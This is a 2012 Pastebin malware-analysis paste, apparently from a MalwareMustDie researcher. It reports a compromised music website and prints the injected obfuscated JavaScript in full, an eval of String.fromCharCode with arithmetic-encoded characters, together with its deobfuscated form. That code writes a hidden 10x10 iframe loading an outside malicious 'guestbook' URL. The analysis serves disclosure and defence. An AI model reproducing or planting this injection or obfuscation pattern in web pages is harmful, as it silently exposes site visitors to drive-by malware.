Advertisement
unixfreaxjp

ritchieblackmore.info injected by fake malware guestbook url

Oct 14th, 2012
102
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //Source of Infection: h00p://ritchieblackmore.info/minstrel/guitarb.html
  2. //Up & Alive PoC:
  3. --19:49:32-- h00p://ritchieblackmore.info/minstrel/guitarb.html
  4. => `./sample'
  5. Connecting to 192.168.7.11:8118... connected.
  6. Proxy request sent, awaiting response... 301 Moved Permanently
  7. Location: http://www.ritchieblackmore.info/minstrel/guitarb.html [following]
  8. --19:49:39-- h00p://www.ritchieblackmore.info/minstrel/guitarb.html
  9. => `./sample'
  10. Connecting to 192.168.7.11:8118... connected.
  11. Proxy request sent, awaiting response... 200 OK
  12. Length: 5,978 (5.8K) [text/html]
  13. 19:49:47 (14.42 KB/s) - `./sample' saved [5978/5978]
  14. // -----------------------------------------------------------------------------;
  15. //obfs found:
  16. <script type='text/javascript'>win=window;gar=win['String'];ga='l';g=win['eva'+ga];sf=gar.fromCharCode;g(sf(4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,52*2,57.5*2,48.5*2,57.5*2,52.5*2,50.5*2,56.5*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,51.5*2,58.5*2,50.5*2,57.5*2,58*2,49*2,55.5*2,55.5*2,53.5*2,23*2,56*2,52*2,56*2,31.5*2,58*2,56*2,30.5*2,51*2,28.5*2,25.5*2,51*2,25*2,24.5*2,28*2,25*2,51*2,28*2,49.5*2,25.5*2,26.5*2,24.5*2,27*2,27*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,51*2,58.5*2,55*2,49.5*2,58*2,52.5*2,55.5*2,55*2,16*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,52*2,57.5*2,48.5*2,57.5*2,52.5*2,50.5*2,56.5*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,51.5*2,58.5*2,50.5*2,57.5*2,58*2,49*2,55.5*2,55.5*2,53.5*2,23*2,56*2,52*2,56*2,31.5*2,58*2,56*2,30.5*2,51*2,28.5*2,25.5*2,51*2,25*2,24.5*2,28*2,25*2,51*2,28*2,49.5*2,25.5*2,26.5*2,24.5*2,27*2,27*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,29.5*2,6.5*2,5*2,4.5*2,62.5*2))</script>
  17.  
  18. //------------------------------------------------------------------------------;
  19. // deobfs here
  20. //
  21. if (document.getElementsByTagName('body')[0]){
  22. iframer();
  23. }
  24. else {
  25. var bdy = document.createElement("body");
  26. try {
  27. document.appendChild(bdy);
  28. }
  29. catch (e){
  30. document.body = bdy;
  31. }
  32. if (document.getElementsByTagName('body')[0]){
  33. iframer();
  34. }
  35. else {
  36. document.write("
  37. <iframe src='http://hsasieq.com/guestbook.php?tp=f93f2182f8c35166' width='10' height='10'
  38. style='visibility: hidden;'></iframe>");
  39. }
  40. }
  41. function iframer(){
  42. document.getElementsByTagName('body')[0].innerHTML += "
  43. <iframe src='http://hsasieq.com/guestbook.php?tp=f93f2182f8c35166' width='10' height='10'
  44. style='visibility: hidden;'></iframe>";
  45. }
  46.  
  47. /////// #MalwareMustDie
Advertisement
RAW Paste Data Copied
Advertisement